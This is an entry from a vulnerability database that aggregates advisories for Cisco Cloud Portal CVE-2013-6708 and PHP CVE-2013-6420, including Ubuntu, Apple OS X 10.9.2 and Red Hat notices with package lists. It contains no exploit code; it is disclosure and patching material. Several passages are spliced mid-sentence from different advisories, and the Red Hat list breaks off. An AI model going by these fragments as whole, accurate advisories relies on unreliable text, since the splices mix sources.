VARIoT IoT vulnerabilities database
| VAR-201312-0456 | CVE-2013-6708 | Cisco Cloud Portal Vulnerable to reading unspecified types of files |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Cloud Portal 9.4 allows remote attackers to read files of unspecified types via a direct request, aka Bug IDs CSCuj08426 and CSCui60889.
An attacker can exploit this issue to download arbitrary files. Information obtained may aid in further attacks.
This issue being tracked by Cisco Bug IDs CSCuj08426 and CSCui60889
| VAR-201312-0207 | CVE-2013-6420 | PHP of ext/openssl/openssl.c Inside asn1_time_to_time_t Vulnerability in arbitrary code execution in function |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The asn1_time_to_time_t function in ext/openssl/openssl.c in PHP before 5.3.28, 5.4.x before 5.4.23, and 5.5.x before 5.5.7 does not properly parse (1) notBefore and (2) notAfter timestamps in X.509 certificates, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted certificate that is not properly handled by the openssl_x509_parse function. PHP is prone to a remote memory-corruption vulnerability.
Attackers can exploit this issue to run arbitrary code within the context of the PHP process. Failed exploit attempts may result in a denial-of-service condition. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language is mainly used for Web development and supports a variety of databases and operating systems. The vulnerability is caused by the openssl_x509_parse() function not correctly parsing the notBefore and notAfter timestamps in the X.509 certificate. The following versions are affected: PHP prior to 5.3.28, 5.4.x prior to 5.4.23, 5.5.x prior to 5.5.7. 6) - x86_64
RHEL Desktop Workstation (v. ============================================================================
Ubuntu Security Notice USN-2055-1
December 12, 2013
php5 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 13.10
- Ubuntu 13.04
- Ubuntu 12.10
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in PHP. (CVE-2013-6420)
It was discovered that PHP incorrectly handled DateInterval objects. (CVE-2013-6712)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 13.10:
libapache2-mod-php5 5.5.3+dfsg-1ubuntu2.1
php5-cgi 5.5.3+dfsg-1ubuntu2.1
php5-cli 5.5.3+dfsg-1ubuntu2.1
Ubuntu 13.04:
libapache2-mod-php5 5.4.9-4ubuntu2.4
php5-cgi 5.4.9-4ubuntu2.4
php5-cli 5.4.9-4ubuntu2.4
Ubuntu 12.10:
libapache2-mod-php5 5.4.6-1ubuntu1.5
php5-cgi 5.4.6-1ubuntu1.5
php5-cli 5.4.6-1ubuntu1.5
Ubuntu 12.04 LTS:
libapache2-mod-php5 5.3.10-1ubuntu3.9
php5-cgi 5.3.10-1ubuntu3.9
php5-cli 5.3.10-1ubuntu3.9
Ubuntu 10.04 LTS:
libapache2-mod-php5 5.3.2-1ubuntu4.22
php5-cgi 5.3.2-1ubuntu4.22
php5-cli 5.3.2-1ubuntu4.22
In general, a standard system update will make all the necessary changes.
Additionally, some packages which requires so has been rebuilt for
php-5.3.28. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-02-25-1 OS X Mavericks 10.9.2 and Security Update
2014-001
OS X Mavericks 10.9.2 and Security Update 2014-001 is now available
and addresses the following:
Apache
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Multiple vulnerabilities in Apache
Description: Multiple vulnerabilities existed in Apache, the most
serious of which may lead to cross-site scripting. These issues were
addressed by updating Apache to version 2.2.26.
CVE-ID
CVE-2013-1862
CVE-2013-1896
App Sandbox
Available for: OS X Mountain Lion v10.8.5
Impact: The App Sandbox may be bypassed
Description: The LaunchServices interface for launching an
application allowed sandboxed apps to specify the list of arguments
passed to the new process. A compromised sandboxed application could
abuse this to bypass the sandbox. This issue was addressed by
preventing sandboxed applications from specifying arguments. This
issue does not affect systems running OS X Mavericks 10.9 or later.
CVE-ID
CVE-2013-5179 : Friedrich Graeter of The Soulmen GbR
ATS
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 and 10.9.1
Impact: Viewing or downloading a document containing a maliciously
crafted embedded font may lead to arbitrary code execution
Description: A memory corruption issue existed in the handling of
handling of Type 1 fonts. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1254 : Felix Groebert of the Google Security Team
ATS
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: The App Sandbox may be bypassed
Description: A memory corruption issue existed in the handling of
Mach messages passed to ATS. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-1262 : Meder Kydyraliev of the Google Security Team
ATS
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: The App Sandbox may be bypassed
Description: An arbitrary free issue existed in the handling of Mach
messages passed to ATS. This issue was addressed through additional
validation of Mach messages.
CVE-ID
CVE-2014-1255 : Meder Kydyraliev of the Google Security Team
ATS
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: The App Sandbox may be bypassed
Description: A buffer overflow issue existed in the handling of Mach
messages passed to ATS. This issue was addressed by additional bounds
checking.
CVE-ID
CVE-2014-1256 : Meder Kydyraliev of the Google Security Team
Certificate Trust Policy
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Root certificates have been updated
Description: The set of system root certificates has been updated.
The complete list of recognized system roots may be viewed via the
Keychain Access application.
CFNetwork Cookies
Available for: OS X Mountain Lion v10.8.5
Impact: Session cookies may persist even after resetting Safari
Description: Resetting Safari did not always delete session cookies
until Safari was closed. This issue was addressed through improved
handling of session cookies. This issue does not affect systems
running OS X Mavericks 10.9 or later.
CVE-ID
CVE-2014-1257 : Rob Ansaldo of Amherst College, Graham Bennett
CoreAnimation
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 and 10.9.1
Impact: Visiting a maliciously crafted site may lead to an
unexpected application termination or arbitrary code execution
Description: A heap buffer overflow existed in CoreAnimation's
handling of images. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1258 : Karl Smith of NCC Group
CoreText
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: Applications that use CoreText may be vulnerable to an
unexpected application termination or arbitrary code execution
Description: A signedness issue existed in CoreText in the handling
of Unicode fonts. This issue is addressed through improved bounds
checking.
CVE-ID
CVE-2014-1261 : Lucas Apa and Carlos Mario Penagos of IOActive Labs
curl
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: An attacker with a privileged network position may intercept
user credentials or other sensitive information
Description: When using curl to connect to an HTTPS URL containing
an IP address, the IP address was not validated against the
certificate. This issue does not affect systems prior to OS X
Mavericks v10.9.
CVE-ID
CVE-2014-1263 : Roland Moriz of Moriz GmbH
Data Security
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: An attacker with a privileged network position may capture
or modify data in sessions protected by SSL/TLS
Description: Secure Transport failed to validate the authenticity of
the connection. This issue was addressed by restoring missing
validation steps.
CVE-ID
CVE-2014-1266
Date and Time
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: An unprivileged user may change the system clock
Description: This update changes the behavior of the systemsetup
command to require administrator privileges to change the system
clock.
CVE-ID
CVE-2014-1265
File Bookmark
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing a file with a maliciously crafted name may lead to
an unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of file
names. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1259
Finder
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: Accessing a file's ACL via Finder may lead to other users
gaining unauthorized access to files
Description: Accessing a file's ACL via Finder may corrupt the ACLs
on the file. This issue was addressed through improved handling of
ACLs.
CVE-ID
CVE-2014-1264
ImageIO
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed by better JPEG handling.
CVE-ID
CVE-2013-6629 : Michal Zalewski
IOSerialFamily
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5
Impact: Executing a malicious application may result in arbitrary
code execution within the kernel
Description: An out of bounds array access existed in the
IOSerialFamily driver. This issue was addressed through additional
bounds checking. This issue does not affect systems running OS X
Mavericks v10.9 or later.
CVE-ID
CVE-2013-5139 : @dent1zt
LaunchServices
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5
Impact: A file could show the wrong extension
Description: An issue existed in the handling of certain unicode
characters that could allow filenames to show incorrect extensions.
The issue was addressed by filtering unsafe unicode characters from
display in filenames. This issue does not affect systems running OS X
Mavericks v10.9 or later.
CVE-ID
CVE-2013-5178 : Jesse Ruderman of Mozilla Corporation, Stephane Sudre
of Intego
NVIDIA Drivers
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Executing a malicious application could result in arbitrary
code execution within the graphics card
Description: An issue existed that allowed writes to some trusted
memory on the graphics card. This issue was addressed by removing the
ability of the host to write to that memory.
CVE-ID
CVE-2013-5986 : Marcin KoĆcielnicki from the X.Org Foundation
Nouveau project
CVE-2013-5987 : Marcin KoĆcielnicki from the X.Org Foundation
Nouveau project
PHP
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Multiple vulnerabilities in PHP
Description: Multiple vulnerabilities existed in PHP, the most
serious of which may have led to arbitrary code execution. These
issues were addressed by updating PHP to version 5.4.22 on OS X
Mavericks v10.9, and 5.3.28 on OS X Lion and Mountain Lion.
CVE-ID
CVE-2013-4073
CVE-2013-4113
CVE-2013-4248
CVE-2013-6420
QuickLook
Available for: OS X Mountain Lion v10.8.5
Impact: Downloading a maliciously crafted Microsoft Office file may
lead to an unexpected application termination or arbitrary code
execution
Description: A memory corruption issue existed in QuickLook's
handling of Microsoft Office files. Downloading a maliciously crafted
Microsoft Office file may have led to an unexpected application
termination or arbitrary code execution. This issue does not affect
systems running OS X Mavericks 10.9 or later.
CVE-ID
CVE-2014-1260 : Felix Groebert of the Google Security Team
QuickLook
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 and 10.9.1
Impact: Downloading a maliciously crafted Microsoft Word document
may lead to an unexpected application termination or arbitrary code
execution
Description: A double free issue existed in QuickLook's handling of
Microsoft Word documents. This issue was addressed through improved
memory management.
CVE-ID
CVE-2014-1252 : Felix Groebert of the Google Security Team
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of 'ftab'
atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1246 : An anonymous researcher working with HP's Zero Day
Initiative
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
'dref' atoms. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1247 : Tom Gallagher & Paul Bates working with HP's Zero Day
Initiative
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of 'ldat'
atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1248 : Jason Kratzer working with iDefense VCP
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing a maliciously crafted PSD image may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of PSD
images. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1249 : dragonltx of Tencent Security Team
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An out of bounds byte swapping issue existed in the
handling of 'ttfo' elements. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-1250 : Jason Kratzer working with iDefense VCP
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A signedness issue existed in the handling of 'stsz'
atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1245 : Tom Gallagher & Paul Bates working with HP's Zero Day
Initiative
Secure Transport
Available for: OS X Mountain Lion v10.8.5
Impact: An attacker may be able to decrypt data protected by SSL
Description: There were known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite used a block cipher in CBC mode.
To address these issues for applications using Secure Transport, the
1-byte fragment mitigation was enabled by default for this
configuration.
CVE-ID
CVE-2011-3389 : Juliano Rizzo and Thai Duong
OS X Mavericks v10.9.2 includes the content of Safari 7.0.2.
OS X Mavericks v10.9.2 and Security Update 2014-001 may be obtained from
the Mac App Store or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBAgAGBQJTDNeoAAoJEPefwLHPlZEwaRAP/3i/2qRvNv6JqmE9p48uEyXn
mlxwXpMyop+vrgMmuiSP14EGSv06HO04PNUtaWPxm7tVYXu0tMtjDcYdIu40TAy6
U0T6QhRZC/uag1DCvdEOvqRUajKmmPtHTCJ6OsQGtGJHlEM+S5XgxRr7qgfkHMfb
OlqFsgpdL/AAiYNfzItN2C+r2Lfwro6LDlxhikpASojlMFQrk8nJ6irRv617anSZ
3DwJW2iJxNfpVrgqA1Nrx1fkrPmeT/8jgGuEP6RaKiWIbfXjRG5BW9WuarMqmaP8
C6XoTaJaqEO9zb7F2uJR0HIYpJd065y/xiYNm91yDWIjdrO3wVgNVPGo1pHVyYsY
Y7lcyHUVJortKF8SHquw0j3Ujeugu8iWp6ND/00/4dGvwb0jzrxPUxkEmJ43130O
t2Obtxdsaa+ub8cZHDN93WB3FQR5hd+KaeXLJC55q0qYY8o8zqdPqXAlYAP2gUQX
iB4Bs7NAh2CNJWNTtk2soTjZOwPvPLSPZ6I3w5i0HVP7HQl5K8chjihAwSeyezCZ
q5gxCiK0lBW88AUd9n3L7ZOW2Rg53mh6+RiUL/VQ7TfidoP417VDKum300pZkgNv
kBCklX9ya7QeLjOMnbnsTk32qG+TiDPgiGZ5IrK6C6T26dexJWbm8tuwPjy5r8mI
aiYIh+SzR0rBdMZRgyzv
=+DAJ
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: php security update
Advisory ID: RHSA-2013:1824-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-1824.html
Issue date: 2013-12-11
CVE Names: CVE-2013-6420
=====================================================================
1. Summary:
Updated php packages that fix one security issue are now available for Red
Hat Enterprise Linux 5.3 Long Life, and Red Hat Enterprise Linux 5.6, 5.9,
6.2, 6.3, and 6.4 Extended Update Support.
The Red Hat Security Response Team has rated this update as having critical
security impact. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available from the CVE link in
the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Compute Node EUS (v. 6.2) - x86_64
Red Hat Enterprise Linux Compute Node EUS (v. 6.3) - x86_64
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.2) - x86_64
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.3) - x86_64
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4) - x86_64
Red Hat Enterprise Linux EUS (v. 5.6 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux EUS (v. 5.9 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux HPC Node EUS (v. 6.4) - x86_64
Red Hat Enterprise Linux Long Life (v. 5.3 server) - i386, ia64, x86_64
Red Hat Enterprise Linux Server EUS (v. 6.2) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server EUS (v. 6.3) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server EUS (v. 6.4) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional EUS (v. 6.2) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional EUS (v. 6.3) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional EUS (v. 6.4) - i386, ppc64, s390x, x86_64
3. Description:
PHP is an HTML-embedded scripting language commonly used with the Apache
HTTP Server. (CVE-2013-6420)
Red Hat would like to thank the PHP project for reporting this issue.
Upstream acknowledges Stefan Esser as the original reporter of this issue.
All php users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue. After installing the
updated packages, the httpd daemon must be restarted for the update to
take effect.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/site/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1036830 - CVE-2013-6420 php: memory corruption in openssl_x509_parse()
6. Package List:
Red Hat Enterprise Linux Long Life (v. 5.3 server):
Source:
php-5.1.6-23.5.el5_3.src.rpm
i386:
php-5.1.6-23.5.el5_3.i386.rpm
php-bcmath-5.1.6-23.5.el5_3.i386.rpm
php-cli-5.1.6-23.5.el5_3.i386.rpm
php-common-5.1.6-23.5.el5_3.i386.rpm
php-dba-5.1.6-23.5.el5_3.i386.rpm
php-debuginfo-5.1.6-23.5.el5_3.i386.rpm
php-devel-5.1.6-23.5.el5_3.i386.rpm
php-gd-5.1.6-23.5.el5_3.i386.rpm
php-imap-5.1.6-23.5.el5_3.i386.rpm
php-ldap-5.1.6-23.5.el5_3.i386.rpm
php-mbstring-5.1.6-23.5.el5_3.i386.rpm
php-mysql-5.1.6-23.5.el5_3.i386.rpm
php-ncurses-5.1.6-23.5.el5_3.i386.rpm
php-odbc-5.1.6-23.5.el5_3.i386.rpm
php-pdo-5.1.6-23.5.el5_3.i386.rpm
php-pgsql-5.1.6-23.5.el5_3.i386.rpm
php-snmp-5.1.6-23.5.el5_3.i386.rpm
php-soap-5.1.6-23.5.el5_3.i386.rpm
php-xml-5.1.6-23.5.el5_3.i386.rpm
php-xmlrpc-5.1.6-23.5.el5_3.i386.rpm
ia64:
php-5.1.6-23.5.el5_3.ia64.rpm
php-bcmath-5.1.6-23.5.el5_3.ia64.rpm
php-cli-5.1.6-23.5.el5_3.ia64.rpm
php-common-5.1.6-23.5.el5_3.ia64.rpm
php-dba-5.1.6-23.5.el5_3.ia64.rpm
php-debuginfo-5.1.6-23.5.el5_3.ia64.rpm
php-devel-5.1.6-23.5.el5_3.ia64.rpm
php-gd-5.1.6-23.5.el5_3.ia64.rpm
php-imap-5.1.6-23.5.el5_3.ia64.rpm
php-ldap-5.1.6-23.5.el5_3.ia64.rpm
php-mbstring-5.1.6-23.5.el5_3.ia64.rpm
php-mysql-5.1.6-23.5.el5_3.ia64.rpm
php-ncurses-5.1.6-23.5.el5_3.ia64.rpm
php-odbc-5.1.6-23.5.el5_3.ia64.rpm
php-pdo-5.1.6-23.5.el5_3.ia64.rpm
php-pgsql-5.1.6-23.5.el5_3.ia64.rpm
php-snmp-5.1.6-23.5.el5_3.ia64.rpm
php-soap-5.1.6-23.5.el5_3.ia64.rpm
php-xml-5.1.6-23.5.el5_3.ia64.rpm
php-xmlrpc-5.1.6-23.5.el5_3.ia64.rpm
x86_64:
php-5.1.6-23.5.el5_3.x86_64.rpm
php-bcmath-5.1.6-23.5.el5_3.x86_64.rpm
php-cli-5.1.6-23.5.el5_3.x86_64.rpm
php-common-5.1.6-23.5.el5_3.x86_64.rpm
php-dba-5.1.6-23.5.el5_3.x86_64.rpm
php-debuginfo-5.1.6-23.5.el5_3.x86_64.rpm
php-devel-5.1.6-23.5.el5_3.x86_64.rpm
php-gd-5.1.6-23.5.el5_3.x86_64.rpm
php-imap-5.1.6-23.5.el5_3.x86_64.rpm
php-ldap-5.1.6-23.5.el5_3.x86_64.rpm
php-mbstring-5.1.6-23.5.el5_3.x86_64.rpm
php-mysql-5.1.6-23.5.el5_3.x86_64.rpm
php-ncurses-5.1.6-23.5.el5_3.x86_64.rpm
php-odbc-5.1.6-23.5.el5_3.x86_64.rpm
php-pdo-5.1.6-23.5.el5_3.x86_64.rpm
php-pgsql-5.1.6-23.5.el5_3.x86_64.rpm
php-snmp-5.1.6-23.5.el5_3.x86_64.rpm
php-soap-5.1.6-23.5.el5_3.x86_64.rpm
php-xml-5.1.6-23.5.el5_3.x86_64.rpm
php-xmlrpc-5.1.6-23.5.el5_3.x86_64.rpm
Red Hat Enterprise Linux EUS (v. 5.6 server):
Source:
php-5.1.6-27.el5_6.6.src.rpm
i386:
php-5.1.6-27.el5_6.6.i386.rpm
php-bcmath-5.1.6-27.el5_6.6.i386.rpm
php-cli-5.1.6-27.el5_6.6.i386.rpm
php-common-5.1.6-27.el5_6.6.i386.rpm
php-dba-5.1.6-27.el5_6.6.i386.rpm
php-debuginfo-5.1.6-27.el5_6.6.i386.rpm
php-devel-5.1.6-27.el5_6.6.i386.rpm
php-gd-5.1.6-27.el5_6.6.i386.rpm
php-imap-5.1.6-27.el5_6.6.i386.rpm
php-ldap-5.1.6-27.el5_6.6.i386.rpm
php-mbstring-5.1.6-27.el5_6.6.i386.rpm
php-mysql-5.1.6-27.el5_6.6.i386.rpm
php-ncurses-5.1.6-27.el5_6.6.i386.rpm
php-odbc-5.1.6-27.el5_6.6.i386.rpm
php-pdo-5.1.6-27.el5_6.6.i386.rpm
php-pgsql-5.1.6-27.el5_6.6.i386.rpm
php-snmp-5.1.6-27.el5_6.6.i386.rpm
php-soap-5.1.6-27.el5_6.6.i386.rpm
php-xml-5.1.6-27.el5_6.6.i386.rpm
php-xmlrpc-5.1.6-27.el5_6.6.i386.rpm
ia64:
php-5.1.6-27.el5_6.6.ia64.rpm
php-bcmath-5.1.6-27.el5_6.6.ia64.rpm
php-cli-5.1.6-27.el5_6.6.ia64.rpm
php-common-5.1.6-27.el5_6.6.ia64.rpm
php-dba-5.1.6-27.el5_6.6.ia64.rpm
php-debuginfo-5.1.6-27.el5_6.6.ia64.rpm
php-devel-5.1.6-27.el5_6.6.ia64.rpm
php-gd-5.1.6-27.el5_6.6.ia64.rpm
php-imap-5.1.6-27.el5_6.6.ia64.rpm
php-ldap-5.1.6-27.el5_6.6.ia64.rpm
php-mbstring-5.1.6-27.el5_6.6.ia64.rpm
php-mysql-5.1.6-27.el5_6.6.ia64.rpm
php-ncurses-5.1.6-27.el5_6.6.ia64.rpm
php-odbc-5.1.6-27.el5_6.6.ia64.rpm
php-pdo-5.1.6-27.el5_6.6.ia64.rpm
php-pgsql-5.1.6-27.el5_6.6.ia64.rpm
php-snmp-5.1.6-27.el5_6.6.ia64.rpm
php-soap-5.1.6-27.el5_6.6.ia64.rpm
php-xml-5.1.6-27.el5_6.6.ia64.rpm
php-xmlrpc-5.1.6-27.el5_6.6.ia64.rpm
ppc:
php-5.1.6-27.el5_6.6.ppc.rpm
php-bcmath-5.1.6-27.el5_6.6.ppc.rpm
php-cli-5.1.6-27.el5_6.6.ppc.rpm
php-common-5.1.6-27.el5_6.6.ppc.rpm
php-dba-5.1.6-27.el5_6.6.ppc.rpm
php-debuginfo-5.1.6-27.el5_6.6.ppc.rpm
php-devel-5.1.6-27.el5_6.6.ppc.rpm
php-gd-5.1.6-27.el5_6.6.ppc.rpm
php-imap-5.1.6-27.el5_6.6.ppc.rpm
php-ldap-5.1.6-27.el5_6.6.ppc.rpm
php-mbstring-5.1.6-27.el5_6.6.ppc.rpm
php-mysql-5.1.6-27.el5_6.6.ppc.rpm
php-ncurses-5.1.6-27.el5_6.6.ppc.rpm
php-odbc-5.1.6-27.el5_6.6.ppc.rpm
php-pdo-5.1.6-27.el5_6.6.ppc.rpm
php-pgsql-5.1.6-27.el5_6.6.ppc.rpm
php-snmp-5.1.6-27.el5_6.6.ppc.rpm
php-soap-5.1.6-27.el5_6.6.ppc.rpm
php-xml-5.1.6-27.el5_6.6.ppc.rpm
php-xmlrpc-5.1.6-27.el5_6.6.ppc.rpm
s390x:
php-5.1.6-27.el5_6.6.s390x.rpm
php-bcmath-5.1.6-27.el5_6.6.s390x.rpm
php-cli-5.1.6-27.el5_6.6.s390x.rpm
php-common-5.1.6-27.el5_6.6.s390x.rpm
php-dba-5.1.6-27.el5_6.6.s390x.rpm
php-debuginfo-5.1.6-27.el5_6.6.s390x.rpm
php-devel-5.1.6-27.el5_6.6.s390x.rpm
php-gd-5.1.6-27.el5_6.6.s390x.rpm
php-imap-5.1.6-27.el5_6.6.s390x.rpm
php-ldap-5.1.6-27.el5_6.6.s390x.rpm
php-mbstring-5.1.6-27.el5_6.6.s390x.rpm
php-mysql-5.1.6-27.el5_6.6.s390x.rpm
php-ncurses-5.1.6-27.el5_6.6.s390x.rpm
php-odbc-5.1.6-27.el5_6.6.s390x.rpm
php-pdo-5.1.6-27.el5_6.6.s390x.rpm
php-pgsql-5.1.6-27.el5_6.6.s390x.rpm
php-snmp-5.1.6-27.el5_6.6.s390x.rpm
php-soap-5.1.6-27.el5_6.6.s390x.rpm
php-xml-5.1.6-27.el5_6.6.s390x.rpm
php-xmlrpc-5.1.6-27.el5_6.6.s390x.rpm
x86_64:
php-5.1.6-27.el5_6.6.x86_64.rpm
php-bcmath-5.1.6-27.el5_6.6.x86_64.rpm
php-cli-5.1.6-27.el5_6.6.x86_64.rpm
php-common-5.1.6-27.el5_6.6.x86_64.rpm
php-dba-5.1.6-27.el5_6.6.x86_64.rpm
php-debuginfo-5.1.6-27.el5_6.6.x86_64.rpm
php-devel-5.1.6-27.el5_6.6.x86_64.rpm
php-gd-5.1.6-27.el5_6.6.x86_64.rpm
php-imap-5.1.6-27.el5_6.6.x86_64.rpm
php-ldap-5.1.6-27.el5_6.6.x86_64.rpm
php-mbstring-5.1.6-27.el5_6.6.x86_64.rpm
php-mysql-5.1.6-27.el5_6.6.x86_64.rpm
php-ncurses-5.1.6-27.el5_6.6.x86_64.rpm
php-odbc-5.1.6-27.el5_6.6.x86_64.rpm
php-pdo-5.1.6-27.el5_6.6.x86_64.rpm
php-pgsql-5.1.6-27.el5_6.6.x86_64.rpm
php-snmp-5.1.6-27.el5_6.6.x86_64.rpm
php-soap-5.1.6-27.el5_6.6.x86_64.rpm
php-xml-5.1.6-27.el5_6.6.x86_64.rpm
php-xmlrpc-5.1.6-27.el5_6.6.x86_64.rpm
Red Hat Enterprise Linux EUS (v. 5.9 server):
Source:
php-5.1.6-40.el5_9.1.src.rpm
i386:
php-5.1.6-40.el5_9.1.i386.rpm
php-bcmath-5.1.6-40.el5_9.1.i386.rpm
php-cli-5.1.6-40.el5_9.1.i386.rpm
php-common-5.1.6-40.el5_9.1.i386.rpm
php-dba-5.1.6-40.el5_9.1.i386.rpm
php-debuginfo-5.1.6-40.el5_9.1.i386.rpm
php-devel-5.1.6-40.el5_9.1.i386.rpm
php-gd-5.1.6-40.el5_9.1.i386.rpm
php-imap-5.1.6-40.el5_9.1.i386.rpm
php-ldap-5.1.6-40.el5_9.1.i386.rpm
php-mbstring-5.1.6-40.el5_9.1.i386.rpm
php-mysql-5.1.6-40.el5_9.1.i386.rpm
php-ncurses-5.1.6-40.el5_9.1.i386.rpm
php-odbc-5.1.6-40.el5_9.1.i386.rpm
php-pdo-5.1.6-40.el5_9.1.i386.rpm
php-pgsql-5.1.6-40.el5_9.1.i386.rpm
php-snmp-5.1.6-40.el5_9.1.i386.rpm
php-soap-5.1.6-40.el5_9.1.i386.rpm
php-xml-5.1.6-40.el5_9.1.i386.rpm
php-xmlrpc-5.1.6-40.el5_9.1.i386.rpm
ia64:
php-5.1.6-40.el5_9.1.ia64.rpm
php-bcmath-5.1.6-40.el5_9.1.ia64.rpm
php-cli-5.1.6-40.el5_9.1.ia64.rpm
php-common-5.1.6-40.el5_9.1.ia64.rpm
php-dba-5.1.6-40.el5_9.1.ia64.rpm
php-debuginfo-5.1.6-40.el5_9.1.ia64.rpm
php-devel-5.1.6-40.el5_9.1.ia64.rpm
php-gd-5.1.6-40.el5_9.1.ia64.rpm
php-imap-5.1.6-40.el5_9.1.ia64.rpm
php-ldap-5.1.6-40.el5_9.1.ia64.rpm
php-mbstring-5.1.6-40.el5_9.1.ia64.rpm
php-mysql-5.1.6-40.el5_9.1.ia64.rpm
